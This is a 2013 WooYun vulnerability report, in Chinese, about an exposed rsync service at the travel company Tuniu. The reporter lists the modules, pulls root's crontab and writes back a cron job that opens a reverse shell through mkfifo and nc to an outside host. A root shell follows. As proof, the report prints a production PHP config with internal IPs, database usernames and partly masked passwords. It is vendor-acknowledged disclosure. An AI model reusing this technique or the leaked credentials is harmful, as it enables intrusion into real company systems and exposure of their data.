当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034232

漏洞标题:利用某运维安全缺陷直接获得途牛内网关键业务权限(可留后门可渗透肯定不是struts)

相关厂商:途牛旅游网

漏洞作者: 结界师

提交时间:2013-08-13 12:45

修复时间:2013-09-27 12:45

公开时间:2013-09-27 12:45

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-13: 细节已通知厂商并且等待厂商处理中
2013-08-13: 厂商已经确认,细节仅向厂商公开
2013-08-23: 细节向核心白帽子及相关领域专家公开
2013-09-02: 细节向普通白帽子公开
2013-09-12: 细节向实习白帽子公开
2013-09-27: 细节向公众公开

简要描述:

利用运维习惯缺陷加上一点点灵感可以直接获得途牛关键业务(非常关键)的系统权限,并且利用该权限可以进行内网渗透

详细说明:

{
                "WyVul": [], 
                "protocol": "tcp", 
                "state": "open", 
                "portid": "873", 
                "Service": {
                    "method": "probed", 
                    "srvName": "rsync", 
                    "srvProduct": "", 
                    "srvVersion": ""
                }
            }


rsync boss.tuniu.com::
place_photo_new	
hotel_photo_new	
route_img_new  	
pic_adv_new    	
provider       	
htdocs         	
olv            	
cron           	
mnt


rsync boss.tuniu.com::cron
drwx------        4096 2013/08/06 21:29:10 .
-rw-------           0 2013/03/11 16:42:57 apache
-rw-------         214 2011/07/02 15:41:03 heming
-rw-------       37776 2013/08/06 21:29:10 root
-rw-------       37777 2013/08/06 16:45:22 root.bak_puppet


激动么激动么,这是神马意思!!

rsync boss.tuniu.com::cron/root /tmp/root
cat /tmp/root
# HEADER: This file was autogenerated at Wed Apr 17 17:48:00 +0800 2013 by puppet.
# HEADER: While it can still be managed manually, it is definitely not recommended.
# HEADER: Note particularly that the comments starting with 'Puppet Name' should
# HEADER: not be deleted, as doing so could cause duplicate cron jobs.
#backup bbs
#0 0 * * 0 /usr/bin/rsync -tvzrpog --progress 58.68.255.36::mnt_bbs /opt/tuniu/mnt2/bbs --bwlimit=1024
0-10,30-40 * * * * (/bin/date >> /tmp/133.log; /bin/ps aux| /bin/sort -k 3 -nr| /usr/bin/head >> /tmp/133.log)
*/10 * * * * (cd /opt/tuniu/www/crm/scripts/yinfulei/; /opt/tuniu/php/bin/php product_change_price_to_order_compare.php)
#0 1 * * *  export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep $dd /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "GET /main.php?do=route" | /bin/awk '{print $2" "$5" "$7" "$8}'> /opt/tuniu/mnt/liuxiaotao.log
20 23 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep "$dd" /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "main.php?do=route" | /bin/awk '{print $2" "$5" "$7" "$8}'> /opt/tuniu/mnt/liuxiaotao.log
30 23 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep "$dd" /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "main.php?do=stock_warning"| /bin/awk '{print $2" "$5" "$7" "$8}'>> /opt/tuniu/mnt/liuxiaotao.log
40 23 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep "$dd" /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "main.php?do=p_ticket_clendar_show"| /bin/awk '{print $2" "$5" "$7" "$8}'>> /opt/tuniu/mnt/liuxiaotao.log


这是说这位运维把cron目录通过rsync开放了么,如果开放了写权限会如何呢?
给它添加

#OMS-2819
*/1 * * * * ( rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *.wooyun.org 9999 >/tmp/f )


然后

rsync /tmp/root root@boss.tuniu.com::cron/root


没有任何错误,我真是个天才,坐等shell

nc -l -vv 9999
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 218.94.82.118.
Ncat: Connection from 218.94.82.118:28542.
sh: no job control in this shell
sh-3.2# sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux dl486Q13X.tuniu.org 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 i686 i386 GNU/Linux
sh-3.2#


剩下的就是......

漏洞证明:

abcd.jpg


<?php
//本地数据库配置信息
define('DB_HOST', '172.22.0.135');
define('DB_PORT', '3306');
define('DB_USERNAME', 'boss');
define('DB_PASSWORD', 'BoSS[马赛克]Niu');
define('DB_SCHEMA', 'crm');
//本地数据库只读配置信息
define('DB_HOST_RO', '172.22.0.171');
#define('DB_HOST_RO', '192.168.1.135');
define('DB_PORT_RO', '3306');
define('DB_USERNAME_RO', 'boss');
define('DB_PASSWORD_RO', 'uinut#133[马赛克]oss#March');
#define('DB_PASSWORD_RO', 'uinut#133[马赛克]oss#March');
define('DB_SCHEMA_RO', 'crm');
//本地只写数据库配置信息
define('DB_HOST_WO', '172.22.0.135');
define('DB_PORT_WO', '3306');
define('DB_USERNAME_WO', 'boss');
define('DB_PASSWORD_WO', 'BoS[马赛克]Niu');
define('DB_SCHEMA_WO', 'crm');
//公网数据库
#define('DB_HOST_NET', '114.[马赛克].94');
#define('DB_HOST_NET', '58.[马赛克].42');
define('DB_HOST_NET', '58.[马赛克].43');
define('DB_PORT_NET', '3306');
define('DB_USERNAME_NET', 'tuniu');
define('DB_PASSWORD_NET', 'Bos[马赛克]#niU');
define('DB_SCHEMA_NET', 'tuniu');
//本地ICE配置
define('ICE_NEED_USE', 1);
define('ICE_HOST_ADDRESS', '210.[马赛克]218');
define('ICE_HOST_PORT', '10000');
// ---------- memcached信息 --------------- //
define('MEMCACHED_HOST', '172.22.0.133');
define('MEMCACHED_PORT', 11211);
define('MEMCACHED_FLAG', false);
//define('MEMCACHED_HOST_NET', '210.[马赛克].218');
define('MEMCACHED_HOST_NET', '60.[马赛克].121');
define('MEMCACHED_PORT_NET', 11211);
// --------------知识库搜索用的地址 -------------
define('KNOWLEDGE_SEARCH_URL',"http://172.22.0.133:8080");
//---------------拉卡啦支付地址------------------
define('LAKALA_HOST',"http://218.[马赛克].238:8080");
//---------------e家保险------------------------
//define('EJIA_HOST',"http://www.ejsino.cn:8080");
//define('EJIA_HOST',"http://203.166.160.178:8080");
define('EJIA_HOST',"http://www.ejsino.com:8080");
//---------------ABCPDF-Server------------------------
define('ABCPDF_HOST',"http://192.168.1.129:80");
define('ABCPDF_HOST_NET',"http://222.[马赛克].142:8129");
define('ABCPDF_HOST_LOCAL',"http://192.168.1.129:80");
define('ABCPDF_DIR',"abcpdf/PDF/");
define('ABCPDF_PATH',"pdf");
//----------------CRM-BOSS-SERVER-----------------
define('CRM_HOST_IP',"172.22.0.133");
define('CRM_HOST_PORT',80);
define('BOSS_HOST_IP',"218.[马赛克].238");
define('BOSS_HOST_PORT',80);
//---------------FAX - SERVER ---------------------
define('FAX_REC_NO',"025-86853999");
define('FAX_BJ_NO',"025-86853999");
define('FAX_HZ_NO',"025-86853999");
//define('FAX_HZ_NO',"025-86853999");
define('FAX_SZ_NO',"025-86853999");
define('FAX_SH_NO',"025-86853999");
define('FAX_TJ_NO',"025-86853999");
define('FAX_SHZ_NO',"025-86853999");
define('FAX_CD_NO',"025-86853999");
define('FAX_WH_NO',"025-86853999");
//---------------Customer Service Hotline ------------
define('PHONE_CUSTOMER_SERVICE_HOTLINE',"4007-999-999");
//----------------RTX - SERVER ---------------------
define('RTX_HOST',"192.168.1.145");
define('RTX_PORT',"8012");
define('RTX_URI',"sendnotify.cgi");
define('RTX_OFFLINE',"getofflineusers.php");
//----------------SOLR - SERVER --------------------
define('SOLR_HOST',"172.22.0.133");
define('SOLR_PORT',"8080");
define('SOLR_URI',"/solr/person");
//----------BOSS WEB 信息 --------------- //
define("BOSS_HOST","boss.tuniu.com");
define("BOSS_PORT","80");
define("BOSS_USERNAME","");
define("BOSS_PASSWORD","");
//----------FMIS RPC 配置 --------------- //
define("FMIS2_HOST","fmis2.tuniu.com");
define("FMIS2_PORT","80");
define("FMIS2_USERNAME","");
define("FMIS2_PASSWORD","");
//OA database add by miaochen 2010.07.06
define('DB_HOST_OA', '172.22.1.195');
define('DB_PORT_OA', '3306');
define('DB_USERNAME_OA', 'TuniuOA');
define('DB_PASSWORD_OA', 'uinut[马赛克]TuniuOA');
define('DB_SCHEMA_OA', 'TuniuOA');
define('OA_URL','oa/');//add by miaochen
define('HD_URL','http://helpdesk.tuniu.com/');
//TUNIU_INTERFACE_HOST
define('TUNIU_INTERFACE_HOST','www.tuniu.com');
define('TUNIU_INTERFACE_PORT','80');
//定义财务系统绝对地址 added by jibing 2009-08-24
define('FMIS_PATH','/opt/tuniu/www/FMIS/');
//定义CRM系统绝对地址 added by jibing 2009-08-24
define('CRM_PATH','/opt/tuniu/www/crm/');
define('FMIS_SWITCH',2);
//快捷航空接口信息配置
define('KUAIJIEAIR_HOST',"www.kuaijieair.net");
define('KUAIJIEAIR_PORT',"80");
define('KUAIJIEAIR_URI',"jipiao/port/s.php");
define('KUAIJIEAIR_UID',"798");
//提成和统计数据
define('DB_HOST_FMIS_RO', '172.22.1.189');
define('DB_PORT_FMIS_RO', '3306');
define('DB_USERNAME_FMIS_RO', '[马赛克]');
define('DB_PASSWORD_FMIS_RO', 'fb123');
define('DB_SCHEMA_FMIS_RO', 'fmis');
//呼叫中心数据库
define('DB_INFOBIRD_HOST', '172.[马赛克].50');
define('DB_INFOBIRD_PORT', '1433');
define('DB_INFOBIRD_USERNAME', 'sa');
define('DB_INFOBIRD_PASSWORD', '[马赛克]');
define('DB_INFOBIRD_SCHEMA', 'infobird');
//酒店订单URL
define('HOTEL_URL','http://crm.tuniu.com/hotelorder');
//added by huxiaomin@20110805
define('CRM_HOST','crm.tuniu.com');
define('FAX_URL','http://fax.tuniu.org/');//add by huxiaomin 2011 08 11 用于传真平台的url
//added by huanleG@20111108
define('CRM_PORT','80');
define('OA_HOST','oa.tuniu.com');

修复方案:

版权声明:转载请注明来源 结界师@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-13 12:48

厂商回复:

问题确认,感谢@结界师

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-13 12:52 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    结界师又调皮了...前排什么都卖

  2. 2013-08-13 12:56 | M0nster ( 实习白帽子 | Rank:53 漏洞数:17 | 允许我国的艺术家先富起来)

    卧槽秒确认

  3. 2013-08-13 12:58 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    4楼卖身卖肾

  4. 2013-08-13 13:32 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    膜拜

  5. 2013-08-13 13:35 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @se55i0n 你被楼上诅咒了,晚上一起出来卖吧,卖身卖肾...

  6. 2013-08-13 13:53 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @小胖子 卖身不

  7. 2013-08-13 13:59 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @淡漠天空 在妓男的眼中,这个世界上没有男人是不卖的,他们对于不卖能理解的上限就是,是不是价钱谈不来。卖可以,WB给够!

  8. 2013-08-13 14:01 | M0nster ( 实习白帽子 | Rank:53 漏洞数:17 | 允许我国的艺术家先富起来)

    @小胖子 哈哈哈哈哈哈哈!!!卖可以,WB给够!

  9. 2013-08-13 17:58 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖子 我靠,才看到:(

  10. 2013-09-02 13:14 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    这个牛逼,真心牛逼!!!